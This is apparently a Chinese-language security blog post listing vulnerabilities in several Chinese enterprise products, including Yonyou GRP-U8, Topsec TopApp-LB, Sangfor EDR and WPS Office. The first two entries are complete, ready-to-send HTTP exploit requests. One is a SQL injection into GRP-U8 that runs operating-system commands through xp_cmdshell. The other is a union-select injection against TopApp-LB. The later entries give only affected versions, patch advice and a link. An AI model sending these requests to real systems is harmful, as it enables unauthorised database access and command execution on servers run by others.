1.用友GRP-u8 SQL注入
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
2.天融信TopApp-LB sql注入
POST /acc/clsf/report/datasource.php HTTP/1.1Host:Connection: closeAccept: text/javascript, text/html, application/xml, text/xml, */*X-Prototype-Version: 1.6.0.3X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57Content-Type: application/x-www-form-urlencodedContent-Length: 201t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。
3.深信服 EDR RCE漏洞
修复建议
-
受影响版本为3.2.17R1, 3.2.21两个版本,如果为这两个版本建议升级版本至 3.2.21.375
4.绿盟UTS绕过登录 官方已修复
可以获得泄露的管理用户md5值密码
5.WPS命令执行漏洞 官方已修复
WPS Office 11.2.0.9453. 图片解析错误导致堆损坏,任意代码执行。
http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html
6.奇治堡垒机python代码注入漏洞
7.联软准入漏洞 (poc未公开)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论